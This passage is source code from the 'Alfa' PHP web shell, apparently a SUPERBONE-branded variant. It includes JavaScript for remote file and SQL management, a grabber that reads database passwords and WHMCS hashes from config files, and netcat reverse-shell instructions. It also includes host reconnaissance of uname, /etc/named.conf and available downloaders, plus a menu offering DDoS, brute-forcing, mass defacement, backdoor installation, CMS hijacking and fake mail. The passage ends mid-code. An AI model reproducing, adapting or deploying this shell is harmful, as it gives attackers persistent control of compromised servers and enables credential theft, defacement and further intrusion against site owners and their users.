echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}

function saveByKey(event){

if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;

$("editor_edit_area").onsubmit();

event.preventDefault();

return false;

}

function setCookie(cname, cvalue, exdays){

var d = new Date();

d.setTime(d.getTime() + (exdays*24*60*60*1000));

var expires = "expires="+ d.toUTCString();

document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";

}

function getCookie(name){

var value = "; " + document.cookie;

var parts = value.split("; " + name + "=");

if (parts.length == 2) return parts.pop().split(";").shift();

}

function editorClose(pos){

d.body.style.overflow = "visible";

elem = $(pos);

elem.setAttribute("class", "editor-anim-close");

if(pos == "editor"){

is_minimized = false;

}else{

cgi_is_minimized = false;

}

setTimeout(function(){

elem.removeAttribute("class");

elem.style.display = "none";

}, 1000);

d.body.style.overflow = "visible";

}

function showEditor(pos){

$(pos).setAttribute("class", "editor-anim-show");

$(pos+"-minimized").setAttribute("class", "minimized-hide");

if(pos == "editor"){

is_minimized = false;

if(cgi_is_minimized){

$("cgiloader-minimized").style.top = "30%";

}

}else{

cgi_is_minimized = false;

if(is_minimized){

$("editor-minimized").style.top = "30%";

}

}

d.body.style.overflow = "hidden";

}

function editorMinimize(pos){

$(pos).setAttribute("class", "editor-anim-minimize");

$(pos+"-minimized").setAttribute("class", "minimized-show");

if(pos == "editor"){

is_minimized = true;

if(cgi_is_minimized){

$("cgiloader-minimized").style.top = "20%";

$("editor-minimized").style.top = "50%";

}else{

$("editor-minimized").style.top = "30%";

}

}else{

cgi_is_minimized = true;

if(is_minimized){

$("cgiloader-minimized").style.top = "20%";

$("editor-minimized").style.top = "50%";

}else{

$("cgiloader-minimized").style.top = "30%";

}

}

d.body.style.overflow = "visible";

}

function clearEditorHistory(){

var check = confirm("Are u Sure?");

if(check){

for(var i in editor_files){

if(i != editor_current_file){

removeHistory(i);

}

}

}

}

function editor(file, mode, arg, pwd, file_id, type){

if(type=="dir"&&file=="..")return false;

if(mode == "download"){

g("FilesTools",pwd,file,"download");

return false;

}

var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;

file = file.trim();

if(Object.keys(editor_files).length == 0){

var cookie_file = getCookie("alfa_history_files");

try{

editor_files = JSON.parse(cookie_file);

for(var t in editor_files){

insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);

}

}catch(e){}

}

if(file.indexOf("/") != -1){

var file_split = file.split("/");

file = file_split[file_split.length - 1];

delete file_split[file_split.length - 1];

cwd = file_split.join("/");

if(islinux){

cwd = "/"+cwd;

}

}

if(typeof type == "undefined"){

type = "";

}

if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){

cwd = pwd.trim();

}

try{

for(var i in editor_files){

if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){

can_append = false;

file_id = i;

break;

}

}

}catch(e){

console.log(e);

}

editor_error = true;

if(typeof arg != "undefined" && arg.length != 0 && arg != null){

param = alfab64(arg);

}

if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){

fid = alfab64(file_id);

pure_fid = file_id;

}else{

var rand_fid = "file_" + getRandom(10);

fid = alfab64(rand_fid);

pure_fid = rand_fid;

}

alfaloader("block");

_Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){

document.querySelector(".editor-content").innerHTML = e;

$("editor").style.display = "block";

alfaloader("none");

evalJS(e);

if(mode != "delete" && editor_error){

var active = d.getElementsByClassName("is_active");

if(active.length != 0){

active[0].className = "file-holder";

}

fid = pure_fid;

file = decodeURIComponent(file);

if(!editor_files[fid] && can_append){

editor_files[fid] = {"file": file, "pwd": cwd, "type": type};

insertToHistory(fid, file, " is_active", type);

if(mode=="mkfile"){

g("FilesMan",null);

}

}else{

$(fid).parentNode.className += " is_active";

}

}

d.body.style.overflow = "hidden";

d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);

if(editor_files[fid]){

d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");

}

editor_current_file = fid;

if(is_minimized){

showEditor("editor");

}

updateCookieEditor();

});

return false;

}

function insertToHistory(fid, file, mode, type){

var active = "";

if(mode && mode != 0){

active = mode;

}

var NewElement = document.createElement("div");

NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";

NewElement.className = "file-holder" + active;

NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});

NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});

var refNode = d.getElementsByClassName("history-list")[0];

refNode.insertBefore(NewElement, refNode.firstChild);

}

function loadType(file,type,id){

if(type == "none"){

_Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){

$(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";

editor_files[id].type = e;

});

}

var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';

if(type == "file"){

type = file.split(".");

type = type[type.length - 1].toLowerCase();

var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];

if(types.indexOf(type) == -1){

type = "notfound";

}

}else{

type = "folder";

}

return img.replace("{type}", type + ".png");

}

function updateDirsEditor(fid, fname){

var current_path = d.mf.c.value + "/";

var oldpath = editor_files[fid].pwd + "/" + fname + "/";

var newpath = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";

oldpath = oldpath.replace(/\/\//g, "/");

newpath = newpath.replace(/\/\//g, "/");

current_path = current_path.replace(/\/\//g, "/");

if(current_path.search(oldpath) != -1){

initDir(current_path.replace(oldpath, newpath));

d.mf.c.value = current_path.replace(oldpath, newpath);

_Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});

}

for(var i in editor_files){

var path = editor_files[i].pwd + "/";

path = path.replace(/\/\//g, "/");

if(path.search(oldpath) != -1){

editor_files[i].pwd = path.replace(oldpath, newpath);

}

}

var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");

var reg2 = new RegExp(fname + " \\\|</b></a>");

d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");

d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");

updateCookieEditor();

}

function updateCookieEditor(){

setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);

}

function setEditorTitle(fid, mode){

if(mode == "out" && editor_current_file != ""){

fid = editor_current_file;

}

if(editor_files[fid]){

d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");

}

}

function removeHistory(el){

delete editor_files[el];

if($(el)){

$(el).parentNode.parentNode.removeChild($(el).parentNode);

}

var elm = d.getElementsByClassName("filestools")[0];

if(elm){

if(elm.getAttribute("fid") == el){

elm.outerHTML = "";

}

}

if(editor_current_file == el){

editor_current_file = "";

}

updateCookieEditor();

}

function getRandom(e){

for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];

return t

}

function reopen(el){

var file_id = el.getAttribute("id")

var pwd = editor_files[file_id].pwd;

var filename = editor_files[file_id].file;

editor(filename, "auto", "", pwd, file_id);

}

function copyToClipboard(el){

var node = document.getElementById(el);

if(document.selection){

var range = document.body.createTextRange();

range.moveToElementText(document.getElementById(el));

range.select();

document.execCommand("Copy");

alert("text copied");

}else if (window.getSelection()){

var range = document.createRange();

range.selectNode(document.getElementById(el));

window.getSelection().removeAllRanges();

window.getSelection().addRange(range);

document.execCommand("copy");

alert("text copied");

}

}

function encrypt(str, pwd) {

if (pwd == null || pwd.length <= 0) {

return null;

}

str = alfab64(str, true);

pwd = alfab64(pwd, true);

var enc_chr = "";

var enc_str = "";

var i = 0;

while (i < str.length) {

for (var j = 0; j < pwd.length; j++) {

enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);

enc_str += String.fromCharCode(enc_chr);

i++;

if (i >= str.length) break;

}

}

return alfab64(enc_str, true);

}

function reloadSetting(e){

alfaloader("block");

_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);

if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);

if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);

return false

}

function reloadColors(config){

var obj = {};

if(typeof config == "undefined"){

d.querySelectorAll(".colors_input").forEach(function(e){

var id = e.getAttribute("target").replace(".", "");

obj[id] = e.value;

});

}else{

obj = config;

}

alfaloader("block");

var checdk = ($("use_default_color").checked?"1":"0");

_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);

}

function alfab64(a, normal){

if(typeof normal != "undefined" || post_encryption_mode == false){

return window.btoa(unescape(encodeURIComponent(a)));

}

return encrypt(a, "'._AlfaSecretKey().'");

}

function evalCss(jcss){

var style = document.createElement("style");

if (style.styleSheet) {

style.styleSheet.cssText = jcss;

} else {

style.appendChild(document.createTextNode(jcss));

}

d.getElementsByTagName("head")[0].appendChild(style);

}

function colorHandlerKey(el){

setTimeout(function(e){

colorHandler(el);

}, 200);

}

function colorHandler(el){

var target = el.getAttribute("target");

var multi = el.getAttribute("multi");

var ishover = target.indexOf(":hover");

if(multi){

var array = JSON.parse(atob(multi));

var jcss = "";

for(i in array.multi_selector){

jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";

}

evalCss(jcss);

}

if(ishover != -1 && !multi){

$("input_" + target.replace(".","")).value = el.value;

$("gui_" + target.replace(".","")).value = el.value;

var css = target+"{color: "+el.value+";}";

evalCss(css);

}else{

$("input_" + target.replace(".","")).value = el.value;

$("gui_" + target.replace(".","")).value = el.value;

if(target == ".header_values"){

target = ".header,.header_values";

}

d.querySelectorAll(target).forEach(function(e){

e.style.color = el.value;

});

}

}

function importConfig(event){

var input = event.target;

var reader = new FileReader();

reader.onload = function(){

var data = reader.result;

try{

var conf = JSON.parse(data);

reloadColors(conf);

}catch(e){

alert("Config is invalid...!");

}

$("importFileBtn").value = "";

};

reader.readAsText(input.files[0]);

}

function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}

function path_history(pos){

_Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);

}

function runcgi(lang){

if(cgi_is_minimized && cgi_lang == lang){

showEditor("cgiloader");

return false;

}

_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){

d.body.style.overflow = "hidden";

$("cgiloader").style.display = "block";

$("cgiframe").innerHTML = e;

cgi_lang = lang;

if(cgi_is_minimized){

$("cgiloader-minimized").setAttribute("class", "minimized-hide");

setTimeout(function(){

$("cgiloader").removeAttribute("class");

if(is_minimized){

$("editor-minimized").style.top = "30%";

}

}, 1000);

}

});

}

';

echo "</script>

<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>

<input type='hidden' name='a' value='dlfile'>

<input type='hidden' name='c' value=''>

<input type='hidden' name='file' value=''>

</form>

<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>

<img id='a_loader' src='".__showicon('loader')."'>";

$cmd_uname = alfaEx("uname -a",false,false);

$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');

if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}

echo '

</head>

<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

<div id="up_bar"></div>

<div class="whole">

<form method="post" name="mf" style="display:none;">

<input type="hidden" name="a">

<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';

for($s=1;$s<=10;$s++){

echo '<input type="hidden" name="alfa'.$s.'">';

}

echo '<input type="hidden" name="charset">

</form>

<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>

<div class="header"><table width="100%" border="0">

<tr>

<td width="3%"><span class="header_vars">Uname:</span></td>

<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>

</tr>

<tr>

<td><span class="header_vars">User:</span></td>

<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ']</span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>

<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="https://superbone.team/assets/superbon.png" /></td>

</tr>

<tr>

<td><span class="header_vars">PHP:</span></td>

<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>

</tr>

<tr>

<td><span class="header_vars">ServerIP:</span></td>

<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>

</tr>

<tr>

<td width="3%"><span class="header_vars">DateTime:</span></td>

<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>

</tr>

<tr>

<td><span class="header_vars">Domains:</span></td>

<td width="76%"><span class="header_values" id="header_domains">';

if($GLOBALS['sys']=='unix'){

$d0mains = _alfa_file("/etc/named.conf",false);

if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{

$count=0;

foreach($d0mains as $d0main){

if(@strstr($d0main,"zone")){

preg_match_all('#zone "(.*)"#', $d0main, $domains);

flush();

if(strlen(trim($domains[1][0])) > 2){

flush();

$count++;}}}

echo "$count Domains";}}

else{echo("Cant Read [ /etc/named.conf ]");}

echo '</span></td>

</tr>

<tr>

<td height="16"><span class="header_vars">HDD:</span></td>

<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>

</tr>';

if($GLOBALS['sys']=='unix'){

$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';

if(!@ini_get('safe_mode')){

if(strlen(alfaEx("id",false,false))>0){

echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';

$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');

$x=0;

foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}

if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}

echo '</td>

</tr>

<tr>

<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';

$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');

$x=0;

foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}

if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}

echo '</td>

</tr>';

}else{

echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";

}

}else{

echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";

}

}else{

echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';

echo alfaEx('ver',false,false);

echo '</td>

</tr> <tr>

<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>

</tr></b>';

}

$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}

echo '<tr>

<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>

</tr>

<tr>

<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">SUPERBONE X TEAM</font></span></a></center></td>

</tr>

<tr>

<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>

</tr>

<tr>

<td height="11"><span class="header_vars">SoftWare: </span></td>

<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>

</tr>';

if($GLOBALS['sys']=="win"){

echo '<tr>

<td height="12"><span class="header_vars">DRIVE:</span></td>

<td colspan="2"><b>'.$drives.'</b></td>

</tr>';

}

echo '<tr>

<td height="12"><span class="header_vars">PWD:</span></td>

<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>

</tr>

</table>

</div>

<div id="meunlist">

<ul>

';

$li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',

'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',

'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',

'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',

'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'

);

foreach($li as $key=>$value){

